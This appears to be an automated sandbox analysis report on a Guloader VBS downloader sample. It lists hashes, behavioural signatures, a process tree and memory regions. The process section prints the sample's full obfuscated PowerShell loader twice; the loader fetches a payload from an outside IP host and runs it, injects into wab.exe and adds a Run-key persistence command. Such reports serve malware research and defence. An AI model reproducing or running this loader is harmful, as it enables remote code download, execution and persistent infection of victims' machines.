Analysis
-
max time kernel
141s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
25-06-2024 01:30
Static task
static1
Behavioral task
behavioral1
Sample
7050385c9ecb2aa84c11b687149985e1aa7a6868d4f63f6b214271d238be956c.vbs
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
7050385c9ecb2aa84c11b687149985e1aa7a6868d4f63f6b214271d238be956c.vbs
Resource
win10v2004-20240611-en
General
-
Target
7050385c9ecb2aa84c11b687149985e1aa7a6868d4f63f6b214271d238be956c.vbs
-
Size
23KB
-
MD5
18a025babdc4df5cb74d565b1b93e1d6
-
SHA1
f9bd62d75f8fd2e8327eea6b324b1c5dd3d880f3
-
SHA256
7050385c9ecb2aa84c11b687149985e1aa7a6868d4f63f6b214271d238be956c
-
SHA512
ff5126bcedf8d7d2927160161ae2c4ecae9fe1f561d97135e92c35c96b111753045b9a6e74529f086083778fcd017ed958a5b8066cb4dd7243c0473ae566978b
-
SSDEEP
384:zDJcEgWPwf0ulPLLgoylkWz1vAaFYruA/du48nAv5PbK7L59LL/OF15JGty:zFcEgWIfttLKWs1v9erzdu48Av5PbIfU
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 3676 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kajpladsens115 = "%Touchere% -w 1 $Limpish=(Get-ItemProperty -Path 'HKCU:\\lewing\\').Kapitalkonti;%Touchere% ($Limpish)" reg.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
wab.exepid process 1836 wab.exe 1836 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 3404 powershell.exe 1836 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3404 set thread context of 1836 3404 powershell.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
powershell.exepowershell.exewab.exepid process 3676 powershell.exe 3676 powershell.exe 3404 powershell.exe 3404 powershell.exe 3404 powershell.exe 1836 wab.exe 1836 wab.exe 1836 wab.exe 1836 wab.exe 1836 wab.exe 1836 wab.exe 1836 wab.exe 1836 wab.exe 1836 wab.exe 1836 wab.exe 1836 wab.exe 1836 wab.exe 1836 wab.exe 1836 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 3404 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3676 powershell.exe Token: SeDebugPrivilege 3404 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
WScript.exepowershell.exepowershell.exewab.execmd.exedescription pid process target process PID 4068 wrote to memory of 3676 4068 WScript.exe powershell.exe PID 4068 wrote to memory of 3676 4068 WScript.exe powershell.exe PID 3676 wrote to memory of 2000 3676 powershell.exe cmd.exe PID 3676 wrote to memory of 2000 3676 powershell.exe cmd.exe PID 3676 wrote to memory of 3404 3676 powershell.exe powershell.exe PID 3676 wrote to memory of 3404 3676 powershell.exe powershell.exe PID 3676 wrote to memory of 3404 3676 powershell.exe powershell.exe PID 3404 wrote to memory of 5088 3404 powershell.exe cmd.exe PID 3404 wrote to memory of 5088 3404 powershell.exe cmd.exe PID 3404 wrote to memory of 5088 3404 powershell.exe cmd.exe PID 3404 wrote to memory of 1836 3404 powershell.exe wab.exe PID 3404 wrote to memory of 1836 3404 powershell.exe wab.exe PID 3404 wrote to memory of 1836 3404 powershell.exe wab.exe PID 3404 wrote to memory of 1836 3404 powershell.exe wab.exe PID 3404 wrote to memory of 1836 3404 powershell.exe wab.exe PID 1836 wrote to memory of 4820 1836 wab.exe cmd.exe PID 1836 wrote to memory of 4820 1836 wab.exe cmd.exe PID 1836 wrote to memory of 4820 1836 wab.exe cmd.exe PID 4820 wrote to memory of 3524 4820 cmd.exe reg.exe PID 4820 wrote to memory of 3524 4820 cmd.exe reg.exe PID 4820 wrote to memory of 3524 4820 cmd.exe reg.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7050385c9ecb2aa84c11b687149985e1aa7a6868d4f63f6b214271d238be956c.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kferters Nonfugitive Kapas Reinscribed Triarthrus Domba Simultanscenernes Pocket Goere Vagtmesters92';$Dowle = 1;Function Eleatic($Skglav){$Pendulant=$Skglav.Length-$Dowle;$Mousee84='SUBSTRIN';$Mousee84+='G';For( $Sporange=5;$Sporange -lt $Pendulant;$Sporange+=6){$Kferters+=$Skglav.$Mousee84.Invoke( $Sporange, $Dowle);}$Kferters;}function Polypragmonic($Inquilinous){ & ($Iltfattig) ($Inquilinous);}$Lrerstand247=Eleatic 'La piMAnfrsoShambzOfficiAtaralStadslKi,meaUnphi/.iffe5 r,ns.Fri e0Z.nks Opvas(TrimeW .ommi Inden MarkdBrabroSekunwalauds Feri KrokuNApollTBro t Bebyr1 jlde0Overf.Funkt0 Upra;ni.zs Bill.WSeacai S.ifnP rte6fodr,4Ester; A.ba Hexagx,nlad6Merce4 Fili;Refle Stoarsp,ltvA,ism:Chaun1devit2Teleg1 Fore.Stala0Frede)Indus ,adekGf.ligeTe,pecTile.kSammeobened/.ermi2 Mi.c0Shr,m1 Gele0Pseud0 Buld1Pet.t0Monit1Unclu Lav lFSkaariKartor,istreMezzofProtooCryptxCat.l/,nfol1Altde2Unlar1Forbr.Milde0Filma ';$Hexanaphthene=Eleatic 'UnripUVenansdepopeDenicr ellu-MembrAMizengBulnieInit nUndectUrban ';$Triarthrus=Eleatic 'Gled,hSandktUn,ostCaus,pflabb:Fejls/Speel/Bals 1 Ciga0Forha3Spira.Spagh1S.ing0.eneg6Jv st. Int.6Drmme7 Ulem.Rever1sep.a2Succe9Kommu/TruttC Ep.sa S ran BillcExag.eTre.arSinicr SkameSejtrgProteiExosksPhrygt SolbrDispoeA dent ortesArvin.AfanclC rtepUl,rak .opu ';$burrel=Eleatic 'Legis>Shrov ';$Iltfattig=Eleatic ' UnmoiVe ode Retsx .xti ';$Resflelsers='Pocket';$phenomenalistic = Eleatic 'T,rque loakcDegr.h prioUnimp Reger%Elucia RelipSvrmspTrykpdTaa,naBer,ntKurs aP ess%Tudbr\Diap,N ,aufaKreretfatuat Indre.tatsrhallugmele,a Tidsl masteUnjognTestasWid.i. ForsMTumb eEksp.d Br,n Iridi&Cou t&U pdr Unbeae TrylcBra,shM senoHered BoogitFe.ae ';Polypragmonic (Eleatic ' meta$CatawgPr,splUdstro Sca bLnm,daCu halE.nst:TitteAAnnekbregisrKinobiVirtuk IdleoLethasVegnem me,laPretor Pa,ymBegifeOptanlXanthaRetemdtaliseSmaglnPainfsOmdre=An en(Stramc ,hyrmper ed S.rg D sil/ Nedvcabide Ripst$ UndtpCordwhTidskeDi len ickeo,ebscmLaveee VildnVandkaBibellThyroiF,rtos Croct Dr,jiK,ghecA.wee)Alkox ');Polypragmonic (Eleatic ' Chud$InappgFalsklAmph.oPolypbTalmuaAppellfoku :OveruRStoreeDruesi FlamnOpsk.sMell.cP.ntarYakokiBeredb CakieS idsdR.fer=Older$Li,elTSanseraforii PtomaRatiorTor,etAnt,mhValgfr BambuHypomsPerip.Arunds EnwopHukoml lo,ei Col,tMana.(Ba se$Preprb S.uduAfblorSimplrB.ntueNock.lAbaxi)bolst ');Polypragmonic (Eleatic ' I gv[TilskNAnemoeDespot.urer. ntiS UnsuePartlrAn uvv ultiiFremmcGlggeehypocPReconoward.i,oadvnKrmmet,naldM f reaSparenka aka ChrogP.ebreDanserEjgil] L.st:Jorde:usporSf.agme DhabcTe.nouSamtarBrnepi Afr.t AktiyKakogP CenorE fagoCoccitBaginoMosekc.trygoQ,aicl Sold Bantu=Paral preoc[overcNSu,ere uretTar.a.EucalSBrekreSkindc.jrneuDominrBl,ndifo,ketFantay UnpoPL.deer,asseoContatPenlioPi.roc WhatoSligelMdrenT SubmyNonadp SkebeOstra] Boni: Mar,:As,ruTForholre.iasAn.ly1 Coop2Bovin ');$Triarthrus=$Reinscribed[0];$Sibilancy= (Eleatic ' Supe$TarbogProprlPulveoPleacbJavana.olsjlf.ske:Br,nkP,histr S preAmphisHjemliBykerfFem,lt Vagt2Kabel3 bede9Uncom=WinteN Cla,e Gur wKnap.-HulkhO UndiburorrjBagtaeH,potc an ltgibel SyrinS ,irkyDormas aspt ,safeSviptmE.sic.For.rNRed ceFluidtS.ovr.RektaW Abr eUm.ddbFr anCWoodilDryptiPomegeRenatnNo,cot');$Sibilancy+=$Abrikosmarmeladens[1];Polypragmonic ($Sibilancy);Polypragmonic (Eleatic 'Montr$ GoodPbrug rVerdeePi,cesstakoi byssfCounttSolbr2Kvikk3Lecks9.roch.Ung.iHSdesteCharaaMorgedG mcre piglr Makks Mand[S.mme$DykkeH Ruske SmokxLu enaInsecnpaahra Physp Dy fh Monit FalbhExpe.eRestrn Konge Dete]Fem.n=.tanc$LabioLcamelrStropeWay.irOppors So.utPerduaKaffenCulpadTyrol2S lsk4Sleat7 Naad ');$Herlas=Eleatic 'Ungli$ Aa ePGearvrDros.eAlarmsDa,sfiBaalff.haketDbena2Flora3Antip9flgev. BestDBe.aeoFremdwForstnRockilphaenoRemusapristdbesn,FDiffei UnhylUpwa,eReinc(Shiki$Sav.sTBlabmr Res.iL,mpha Ornir FilitskildhK,nder AntiuAgnizsDrift, Bark$AstroUZoomen Philb Dea.lconnaebronznUd incNaahihtmmeri A onnGi pogUdsa lR,ehay.hyli)Proje ';$Unblenchingly=$Abrikosmarmeladens[0];Polypragmonic (Eleatic 'Skorp$TrichgFragmlKonfeoMeva,bHjaelaMet,ll isoa:Tenanh ksneoTurfsrk mmasForstemisd.p GrapaCrysttAfdelh lexb=Backf(CykliTPra.ieFarmos Kompt Medu- jlePLievea Pr stUnmodhDemoc Glee$Ob,erUKollanTopunbCigarlVejrseWortsnun dvcB.omshPimpliOrininHegneg Ja,tlSacheyDobbe)S ill ');while (!$horsepath) {Polypragmonic (Eleatic 'hersk$KabelgFatuil StemoTil.jbDug ea,ortolBombe:bordaHUdnvneFasc lDesmet Cyane Toisd Mythi progg FejltAfboeeSa,ran Re.aepulersFo,ne=Afs.u$.engetRituar.nderu Ing,emilit ') ;Polypragmonic $Herlas;Polypragmonic (Eleatic ' U,plSBeskatBl,odaSolmorGarvetfirsa-SanscSNidstlcolybesainte Wildp tele chora4befol ');Polypragmonic (Eleatic 'Runei$Aabengfel.mlA ridoSup,rb HeweaKnuselkuver:ostrahOp.agoKautirVo.casKondee TrnipSporva Weigt DetrhMi.it= Cor,(YmperT Igane .letsDeplet,hoto-OmaniPTidebaAcinatLedgeh Vulc Ro le$ForbrUBeslgnShackbOnestlKunsteLoch,nSadelcStrenhBra,diGuld,n Sad gSignalLevetyRavne)Torr, ') ;Polypragmonic (Eleatic 'Oparb$Skralg F,ltlFortio unprbE hauaPass.lMilie:MoralKAfkrsaViraspFo itaForsisPros =Fotos$Disbogre.ogl App o LongbIndisaSpoillTil n: .utgN Enkeo Orn.n VenefGenseuBonedg ColliNon utDobbeiL dervKampmeForc.+.irok+ mack%rhaet$RhabdRLevereMin,ri ,ntenActinsOmdancExtrer,yfusi DissbRkkeueUn ondScree.Ansttc Eur.ofossru.althnAarsttDatas ') ;$Triarthrus=$Reinscribed[$Kapas];}$Alpid169=285050;$Krftcellen=28120;Polypragmonic (Eleatic 'Soldi$No,esgPar,dl,yggeo ,kkobBe pea InstlHeksa:DemisG Bas.oUren eSpej.r Skrsepil s Enked=Outsi ,erumGSha.te plurtClear-BilleCPennyo ProbnCandutvalbye Tr enPaatetDi ku In.e$ LyskUFrstenPrerobSkystlBro.ee RoyanChamfcKa,tohInd aiPasten,ocesgStylolP otoy B,oc ');Polypragmonic (Eleatic ' Proi$Afsm.g,nsatlDirekoUnderbtelega XenolO ont: Re,rmRetr.a I.pogHaed.tZi,pesDherip C.umrWa,kiogalejgS,ramsSithe Co,vi=Antia odif[ blokS imenyThearsOverstReture .ontmD,cry..mphiC B jaoCommon,ottsvS.umse HandrversitKontr]Sempe: D.pr:Fl,gtFF.rinr Pit oIndanmFasciB PandabaandsrelateD ris6 Adst4RedbeSHornltLabelr.ersoi eputnSteckgHaema(Fo.ds$DegueGMassaoKlas,e HandrNosopeMi,ut)Cadge ');Polypragmonic (Eleatic ' He.l$RapatgRi ualStrimo primbTvre,aLabbelFeria:T.bakMscr.uoTam.onDefibtSabbae,imerrGnaskeHu ann disbdFejlmeM dersTekst Indig=Kl.mm Sttte[InhalS A,beyhypers.isagtHemiseIntrom Radi.dubisTFasteeVrd gxLubr tSpkni.StrumE E.bonUltracKri toGeo.odCoanuiUngosn .issg rada]Parts:Vi ce: p.akAMi.joShjre,CalfelI Ky,hIAchro..ndocGsmooteBestst Ou.cSPronitPen.urAfl eiEvolunKlvergMedy (re,ge$sigbjmAvidoaFiskegProsptMuttos HaanpUne,orGran,o TogfgCountsSe.qu)thing ');Polypragmonic (Eleatic 'Xan.h$ Reimg conolSign,oElsewbGribea ,etrl Nucl:ElectPFullooGamlioVask,lAflvnhB,gataOms,al C.eel Futu=Und.r$MarioMIndbio DaftnHabittcorozeVesterPaloneFishpnAgnesdPanate KeglsMedio.OkkersNon,muFurnibMorgusDucaltSoranrKontriLie,hnFaldegQue i(Cauks$UnshaAGeneolM,rkepLavagiVerdedWicke1Lvspr6I sen9 Int,, Cigs$VidunK,eforrKatatfAtomptDisprcKlun,eEpihilUtil,lLead.eHumorneuxan),iskr ');Polypragmonic $Poolhall;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nattergalens.Med && echo t"3⤵
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kferters Nonfugitive Kapas Reinscribed Triarthrus Domba Simultanscenernes Pocket Goere Vagtmesters92';$Dowle = 1;Function Eleatic($Skglav){$Pendulant=$Skglav.Length-$Dowle;$Mousee84='SUBSTRIN';$Mousee84+='G';For( $Sporange=5;$Sporange -lt $Pendulant;$Sporange+=6){$Kferters+=$Skglav.$Mousee84.Invoke( $Sporange, $Dowle);}$Kferters;}function Polypragmonic($Inquilinous){ & ($Iltfattig) ($Inquilinous);}$Lrerstand247=Eleatic 'La piMAnfrsoShambzOfficiAtaralStadslKi,meaUnphi/.iffe5 r,ns.Fri e0Z.nks Opvas(TrimeW .ommi Inden MarkdBrabroSekunwalauds Feri KrokuNApollTBro t Bebyr1 jlde0Overf.Funkt0 Upra;ni.zs Bill.WSeacai S.ifnP rte6fodr,4Ester; A.ba Hexagx,nlad6Merce4 Fili;Refle Stoarsp,ltvA,ism:Chaun1devit2Teleg1 Fore.Stala0Frede)Indus ,adekGf.ligeTe,pecTile.kSammeobened/.ermi2 Mi.c0Shr,m1 Gele0Pseud0 Buld1Pet.t0Monit1Unclu Lav lFSkaariKartor,istreMezzofProtooCryptxCat.l/,nfol1Altde2Unlar1Forbr.Milde0Filma ';$Hexanaphthene=Eleatic 'UnripUVenansdepopeDenicr ellu-MembrAMizengBulnieInit nUndectUrban ';$Triarthrus=Eleatic 'Gled,hSandktUn,ostCaus,pflabb:Fejls/Speel/Bals 1 Ciga0Forha3Spira.Spagh1S.ing0.eneg6Jv st. Int.6Drmme7 Ulem.Rever1sep.a2Succe9Kommu/TruttC Ep.sa S ran BillcExag.eTre.arSinicr SkameSejtrgProteiExosksPhrygt SolbrDispoeA dent ortesArvin.AfanclC rtepUl,rak .opu ';$burrel=Eleatic 'Legis>Shrov ';$Iltfattig=Eleatic ' UnmoiVe ode Retsx .xti ';$Resflelsers='Pocket';$phenomenalistic = Eleatic 'T,rque loakcDegr.h prioUnimp Reger%Elucia RelipSvrmspTrykpdTaa,naBer,ntKurs aP ess%Tudbr\Diap,N ,aufaKreretfatuat Indre.tatsrhallugmele,a Tidsl masteUnjognTestasWid.i. ForsMTumb eEksp.d Br,n Iridi&Cou t&U pdr Unbeae TrylcBra,shM senoHered BoogitFe.ae ';Polypragmonic (Eleatic ' meta$CatawgPr,splUdstro Sca bLnm,daCu halE.nst:TitteAAnnekbregisrKinobiVirtuk IdleoLethasVegnem me,laPretor Pa,ymBegifeOptanlXanthaRetemdtaliseSmaglnPainfsOmdre=An en(Stramc ,hyrmper ed S.rg D sil/ Nedvcabide Ripst$ UndtpCordwhTidskeDi len ickeo,ebscmLaveee VildnVandkaBibellThyroiF,rtos Croct Dr,jiK,ghecA.wee)Alkox ');Polypragmonic (Eleatic ' Chud$InappgFalsklAmph.oPolypbTalmuaAppellfoku :OveruRStoreeDruesi FlamnOpsk.sMell.cP.ntarYakokiBeredb CakieS idsdR.fer=Older$Li,elTSanseraforii PtomaRatiorTor,etAnt,mhValgfr BambuHypomsPerip.Arunds EnwopHukoml lo,ei Col,tMana.(Ba se$Preprb S.uduAfblorSimplrB.ntueNock.lAbaxi)bolst ');Polypragmonic (Eleatic ' I gv[TilskNAnemoeDespot.urer. ntiS UnsuePartlrAn uvv ultiiFremmcGlggeehypocPReconoward.i,oadvnKrmmet,naldM f reaSparenka aka ChrogP.ebreDanserEjgil] L.st:Jorde:usporSf.agme DhabcTe.nouSamtarBrnepi Afr.t AktiyKakogP CenorE fagoCoccitBaginoMosekc.trygoQ,aicl Sold Bantu=Paral preoc[overcNSu,ere uretTar.a.EucalSBrekreSkindc.jrneuDominrBl,ndifo,ketFantay UnpoPL.deer,asseoContatPenlioPi.roc WhatoSligelMdrenT SubmyNonadp SkebeOstra] Boni: Mar,:As,ruTForholre.iasAn.ly1 Coop2Bovin ');$Triarthrus=$Reinscribed[0];$Sibilancy= (Eleatic ' Supe$TarbogProprlPulveoPleacbJavana.olsjlf.ske:Br,nkP,histr S preAmphisHjemliBykerfFem,lt Vagt2Kabel3 bede9Uncom=WinteN Cla,e Gur wKnap.-HulkhO UndiburorrjBagtaeH,potc an ltgibel SyrinS ,irkyDormas aspt ,safeSviptmE.sic.For.rNRed ceFluidtS.ovr.RektaW Abr eUm.ddbFr anCWoodilDryptiPomegeRenatnNo,cot');$Sibilancy+=$Abrikosmarmeladens[1];Polypragmonic ($Sibilancy);Polypragmonic (Eleatic 'Montr$ GoodPbrug rVerdeePi,cesstakoi byssfCounttSolbr2Kvikk3Lecks9.roch.Ung.iHSdesteCharaaMorgedG mcre piglr Makks Mand[S.mme$DykkeH Ruske SmokxLu enaInsecnpaahra Physp Dy fh Monit FalbhExpe.eRestrn Konge Dete]Fem.n=.tanc$LabioLcamelrStropeWay.irOppors So.utPerduaKaffenCulpadTyrol2S lsk4Sleat7 Naad ');$Herlas=Eleatic 'Ungli$ Aa ePGearvrDros.eAlarmsDa,sfiBaalff.haketDbena2Flora3Antip9flgev. BestDBe.aeoFremdwForstnRockilphaenoRemusapristdbesn,FDiffei UnhylUpwa,eReinc(Shiki$Sav.sTBlabmr Res.iL,mpha Ornir FilitskildhK,nder AntiuAgnizsDrift, Bark$AstroUZoomen Philb Dea.lconnaebronznUd incNaahihtmmeri A onnGi pogUdsa lR,ehay.hyli)Proje ';$Unblenchingly=$Abrikosmarmeladens[0];Polypragmonic (Eleatic 'Skorp$TrichgFragmlKonfeoMeva,bHjaelaMet,ll isoa:Tenanh ksneoTurfsrk mmasForstemisd.p GrapaCrysttAfdelh lexb=Backf(CykliTPra.ieFarmos Kompt Medu- jlePLievea Pr stUnmodhDemoc Glee$Ob,erUKollanTopunbCigarlVejrseWortsnun dvcB.omshPimpliOrininHegneg Ja,tlSacheyDobbe)S ill ');while (!$horsepath) {Polypragmonic (Eleatic 'hersk$KabelgFatuil StemoTil.jbDug ea,ortolBombe:bordaHUdnvneFasc lDesmet Cyane Toisd Mythi progg FejltAfboeeSa,ran Re.aepulersFo,ne=Afs.u$.engetRituar.nderu Ing,emilit ') ;Polypragmonic $Herlas;Polypragmonic (Eleatic ' U,plSBeskatBl,odaSolmorGarvetfirsa-SanscSNidstlcolybesainte Wildp tele chora4befol ');Polypragmonic (Eleatic 'Runei$Aabengfel.mlA ridoSup,rb HeweaKnuselkuver:ostrahOp.agoKautirVo.casKondee TrnipSporva Weigt DetrhMi.it= Cor,(YmperT Igane .letsDeplet,hoto-OmaniPTidebaAcinatLedgeh Vulc Ro le$ForbrUBeslgnShackbOnestlKunsteLoch,nSadelcStrenhBra,diGuld,n Sad gSignalLevetyRavne)Torr, ') ;Polypragmonic (Eleatic 'Oparb$Skralg F,ltlFortio unprbE hauaPass.lMilie:MoralKAfkrsaViraspFo itaForsisPros =Fotos$Disbogre.ogl App o LongbIndisaSpoillTil n: .utgN Enkeo Orn.n VenefGenseuBonedg ColliNon utDobbeiL dervKampmeForc.+.irok+ mack%rhaet$RhabdRLevereMin,ri ,ntenActinsOmdancExtrer,yfusi DissbRkkeueUn ondScree.Ansttc Eur.ofossru.althnAarsttDatas ') ;$Triarthrus=$Reinscribed[$Kapas];}$Alpid169=285050;$Krftcellen=28120;Polypragmonic (Eleatic 'Soldi$No,esgPar,dl,yggeo ,kkobBe pea InstlHeksa:DemisG Bas.oUren eSpej.r Skrsepil s Enked=Outsi ,erumGSha.te plurtClear-BilleCPennyo ProbnCandutvalbye Tr enPaatetDi ku In.e$ LyskUFrstenPrerobSkystlBro.ee RoyanChamfcKa,tohInd aiPasten,ocesgStylolP otoy B,oc ');Polypragmonic (Eleatic ' Proi$Afsm.g,nsatlDirekoUnderbtelega XenolO ont: Re,rmRetr.a I.pogHaed.tZi,pesDherip C.umrWa,kiogalejgS,ramsSithe Co,vi=Antia odif[ blokS imenyThearsOverstReture .ontmD,cry..mphiC B jaoCommon,ottsvS.umse HandrversitKontr]Sempe: D.pr:Fl,gtFF.rinr Pit oIndanmFasciB PandabaandsrelateD ris6 Adst4RedbeSHornltLabelr.ersoi eputnSteckgHaema(Fo.ds$DegueGMassaoKlas,e HandrNosopeMi,ut)Cadge ');Polypragmonic (Eleatic ' He.l$RapatgRi ualStrimo primbTvre,aLabbelFeria:T.bakMscr.uoTam.onDefibtSabbae,imerrGnaskeHu ann disbdFejlmeM dersTekst Indig=Kl.mm Sttte[InhalS A,beyhypers.isagtHemiseIntrom Radi.dubisTFasteeVrd gxLubr tSpkni.StrumE E.bonUltracKri toGeo.odCoanuiUngosn .issg rada]Parts:Vi ce: p.akAMi.joShjre,CalfelI Ky,hIAchro..ndocGsmooteBestst Ou.cSPronitPen.urAfl eiEvolunKlvergMedy (re,ge$sigbjmAvidoaFiskegProsptMuttos HaanpUne,orGran,o TogfgCountsSe.qu)thing ');Polypragmonic (Eleatic 'Xan.h$ Reimg conolSign,oElsewbGribea ,etrl Nucl:ElectPFullooGamlioVask,lAflvnhB,gataOms,al C.eel Futu=Und.r$MarioMIndbio DaftnHabittcorozeVesterPaloneFishpnAgnesdPanate KeglsMedio.OkkersNon,muFurnibMorgusDucaltSoranrKontriLie,hnFaldegQue i(Cauks$UnshaAGeneolM,rkepLavagiVerdedWicke1Lvspr6I sen9 Int,, Cigs$VidunK,eforrKatatfAtomptDisprcKlun,eEpihilUtil,lLead.eHumorneuxan),iskr ');Polypragmonic $Poolhall;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nattergalens.Med && echo t"4⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kajpladsens115" /t REG_EXPAND_SZ /d "%Touchere% -w 1 $Limpish=(Get-ItemProperty -Path 'HKCU:\lewing\').Kapitalkonti;%Touchere% ($Limpish)"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kajpladsens115" /t REG_EXPAND_SZ /d "%Touchere% -w 1 $Limpish=(Get-ItemProperty -Path 'HKCU:\lewing\').Kapitalkonti;%Touchere% ($Limpish)"6⤵
- Adds Run key to start application
- Modifies registry key
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xausm2rp.nrn.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Nattergalens.MedFilesize
407KB
MD5bc4f5aff2f4ae56dce61f5e04f8613eb
SHA16fa50ea97319650309e96b55696c198003634874
SHA2567ecf5fecf64cf7d7f0f6bcae993f1f35687ae5c37eb3a80bd7422eb4eb1f6114
SHA512a6adcda7a3ac80f1283590055890af00d83db9f0cc72a3c241b767dc9931fdad77723d6ca39ea7489d72dd9144d788e001f4c6341b4fa52e9399add295359a0d
-
memory/1836-50-0x0000000000FF0000-0x0000000004F88000-memory.dmpFilesize
63.6MB
-
memory/1836-42-0x0000000000FF0000-0x0000000004F88000-memory.dmpFilesize
63.6MB
-
memory/3404-16-0x0000000004F20000-0x0000000005548000-memory.dmpFilesize
6.2MB
-
memory/3404-34-0x0000000006FC0000-0x0000000007056000-memory.dmpFilesize
600KB
-
memory/3404-38-0x0000000008720000-0x000000000C6B8000-memory.dmpFilesize
63.6MB
-
memory/3404-17-0x0000000004E60000-0x0000000004E82000-memory.dmpFilesize
136KB
-
memory/3404-18-0x0000000005590000-0x00000000055F6000-memory.dmpFilesize
408KB
-
memory/3404-19-0x00000000056B0000-0x0000000005716000-memory.dmpFilesize
408KB
-
memory/3404-29-0x0000000005720000-0x0000000005A74000-memory.dmpFilesize
3.3MB
-
memory/3404-30-0x0000000005D00000-0x0000000005D1E000-memory.dmpFilesize
120KB
-
memory/3404-31-0x0000000005D50000-0x0000000005D9C000-memory.dmpFilesize
304KB
-
memory/3404-32-0x0000000007540000-0x0000000007BBA000-memory.dmpFilesize
6.5MB
-
memory/3404-33-0x0000000006280000-0x000000000629A000-memory.dmpFilesize
104KB
-
memory/3404-15-0x0000000002420000-0x0000000002456000-memory.dmpFilesize
216KB
-
memory/3404-35-0x0000000006F50000-0x0000000006F72000-memory.dmpFilesize
136KB
-
memory/3404-36-0x0000000008170000-0x0000000008714000-memory.dmpFilesize
5.6MB
-
memory/3676-12-0x00007FFDD7F40000-0x00007FFDD8A01000-memory.dmpFilesize
10.8MB
-
memory/3676-0-0x00007FFDD7F43000-0x00007FFDD7F45000-memory.dmpFilesize
8KB
-
memory/3676-39-0x00007FFDD7F40000-0x00007FFDD8A01000-memory.dmpFilesize
10.8MB
-
memory/3676-40-0x00007FFDD7F43000-0x00007FFDD7F45000-memory.dmpFilesize
8KB
-
memory/3676-1-0x00007FFDD7F40000-0x00007FFDD8A01000-memory.dmpFilesize
10.8MB
-
memory/3676-45-0x00007FFDD7F40000-0x00007FFDD8A01000-memory.dmpFilesize
10.8MB
-
memory/3676-2-0x000002BE88530000-0x000002BE88552000-memory.dmpFilesize
136KB